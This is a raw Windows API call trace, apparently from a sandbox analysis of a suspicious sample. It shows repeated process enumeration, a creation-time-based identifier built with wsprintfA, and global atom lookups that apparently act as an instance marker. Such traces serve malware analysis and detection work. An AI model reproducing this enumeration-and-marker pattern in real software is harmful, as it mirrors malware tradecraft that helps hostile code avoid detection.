	[0092.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.868] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.868] CloseHandle (hObject=0x20c) returned 1
	[0092.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.869] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.869] CloseHandle (hObject=0x20c) returned 1
	[0092.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0092.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0092.940] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0092.941] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0092.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0092.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0092.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0092.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0092.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0092.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0092.942] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0092.942] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.942] CloseHandle (hObject=0x20c) returned 1
	[0092.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0092.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0092.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0092.943] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.943] CloseHandle (hObject=0x20c) returned 1
	[0092.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0092.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0092.943] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.943] CloseHandle (hObject=0x20c) returned 1
	[0092.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0092.943] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.943] CloseHandle (hObject=0x20c) returned 1
	[0092.943] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0092.944] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.944] CloseHandle (hObject=0x20c) returned 1
	[0092.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0092.944] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.944] CloseHandle (hObject=0x20c) returned 1
	[0092.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0092.944] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.944] CloseHandle (hObject=0x20c) returned 1
	[0092.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0092.944] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.944] CloseHandle (hObject=0x20c) returned 1
	[0092.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0092.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0092.944] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.944] CloseHandle (hObject=0x20c) returned 1
	[0092.944] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0092.945] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.945] CloseHandle (hObject=0x20c) returned 1
	[0092.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0092.945] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.945] CloseHandle (hObject=0x20c) returned 1
	[0092.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0092.945] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.945] CloseHandle (hObject=0x20c) returned 1
	[0092.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0092.945] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.945] CloseHandle (hObject=0x20c) returned 1
	[0092.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0092.945] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.945] CloseHandle (hObject=0x20c) returned 1
	[0092.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0092.946] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.946] CloseHandle (hObject=0x20c) returned 1
	[0092.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0092.946] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.946] CloseHandle (hObject=0x20c) returned 1
	[0092.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0092.946] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.946] CloseHandle (hObject=0x20c) returned 1
	[0092.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0092.946] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.946] CloseHandle (hObject=0x20c) returned 1
	[0092.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0092.946] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.946] CloseHandle (hObject=0x20c) returned 1
	[0092.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0092.947] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.947] CloseHandle (hObject=0x20c) returned 1
	[0092.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0092.947] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.947] CloseHandle (hObject=0x20c) returned 1
	[0092.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0092.947] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.947] CloseHandle (hObject=0x20c) returned 1
	[0092.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0092.947] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.947] CloseHandle (hObject=0x20c) returned 1
	[0092.947] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0092.947] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.947] CloseHandle (hObject=0x20c) returned 1
	[0092.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0092.948] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.948] CloseHandle (hObject=0x20c) returned 1
	[0092.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0092.948] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.948] CloseHandle (hObject=0x20c) returned 1
	[0092.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0092.948] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.948] CloseHandle (hObject=0x20c) returned 1
	[0092.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0092.948] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.948] CloseHandle (hObject=0x20c) returned 1
	[0092.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0092.948] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.948] CloseHandle (hObject=0x20c) returned 1
	[0092.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0092.949] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.949] CloseHandle (hObject=0x20c) returned 1
	[0092.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.949] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.949] CloseHandle (hObject=0x20c) returned 1
	[0092.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0092.949] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.949] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0092.949] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0092.949] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0092.950] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.950] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0092.950] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0092.950] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0092.950] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0092.951] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0092.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0092.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0092.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0092.951] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.951] CloseHandle (hObject=0x20c) returned 1
	[0092.951] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0092.951] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0092.951] CloseHandle (hObject=0x20c) returned 1
	[0093.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0093.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0093.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0093.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0093.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0093.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0093.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0093.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0093.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0093.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0093.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0093.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x20c
	[0093.060] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.060] CloseHandle (hObject=0x20c) returned 1
	[0093.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0093.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0093.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x20c
	[0093.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.061] CloseHandle (hObject=0x20c) returned 1
	[0093.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0093.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x20c
	[0093.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.061] CloseHandle (hObject=0x20c) returned 1
	[0093.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x20c
	[0093.061] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.061] CloseHandle (hObject=0x20c) returned 1
	[0093.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x20c
	[0093.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.062] CloseHandle (hObject=0x20c) returned 1
	[0093.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x20c
	[0093.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.062] CloseHandle (hObject=0x20c) returned 1
	[0093.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x20c
	[0093.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.062] CloseHandle (hObject=0x20c) returned 1
	[0093.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x20c
	[0093.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.062] CloseHandle (hObject=0x20c) returned 1
	[0093.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0093.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x20c
	[0093.062] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.062] CloseHandle (hObject=0x20c) returned 1
	[0093.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x20c
	[0093.063] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.063] CloseHandle (hObject=0x20c) returned 1
	[0093.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x20c
	[0093.063] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.063] CloseHandle (hObject=0x20c) returned 1
	[0093.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x20c
	[0093.063] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.063] CloseHandle (hObject=0x20c) returned 1
	[0093.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x20c
	[0093.063] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.063] CloseHandle (hObject=0x20c) returned 1
	[0093.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x20c
	[0093.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.064] CloseHandle (hObject=0x20c) returned 1
	[0093.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x20c
	[0093.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.064] CloseHandle (hObject=0x20c) returned 1
	[0093.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x20c
	[0093.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.064] CloseHandle (hObject=0x20c) returned 1
	[0093.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x20c
	[0093.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.064] CloseHandle (hObject=0x20c) returned 1
	[0093.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x20c
	[0093.064] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.064] CloseHandle (hObject=0x20c) returned 1
	[0093.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x20c
	[0093.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.065] CloseHandle (hObject=0x20c) returned 1
	[0093.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x20c
	[0093.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.065] CloseHandle (hObject=0x20c) returned 1
	[0093.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x20c
	[0093.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.065] CloseHandle (hObject=0x20c) returned 1
	[0093.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x20c
	[0093.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.065] CloseHandle (hObject=0x20c) returned 1
	[0093.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x20c
	[0093.065] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.065] CloseHandle (hObject=0x20c) returned 1
	[0093.065] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x20c
	[0093.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.066] CloseHandle (hObject=0x20c) returned 1
	[0093.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x20c
	[0093.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.066] CloseHandle (hObject=0x20c) returned 1
	[0093.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x20c
	[0093.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.066] CloseHandle (hObject=0x20c) returned 1
	[0093.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x20c
	[0093.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.066] CloseHandle (hObject=0x20c) returned 1
	[0093.066] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x20c
	[0093.066] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.066] CloseHandle (hObject=0x20c) returned 1
	[0093.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x20c
	[0093.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.067] CloseHandle (hObject=0x20c) returned 1
	[0093.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x20c
	[0093.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.067] CloseHandle (hObject=0x20c) returned 1
	[0093.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0093.067] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.067] CloseHandle (hObject=0x20c) returned 1
	[0093.067] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x20c
	[0093.067] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.068] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0093.068] GetProcessTimes (in: hProcess=0x20c, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0093.068] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0093.068] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.069] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0093.069] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0093.069] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0093.069] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0093.069] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0093.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0093.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0093.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x20c
	[0093.069] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.070] CloseHandle (hObject=0x20c) returned 1
	[0093.070] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x20c
	[0093.070] IsWow64Process (in: hProcess=0x20c, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0093.070] CloseHandle (hObject=0x20c) returned 1
	[0093.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0093.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0093.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0093.450] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0093.451] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
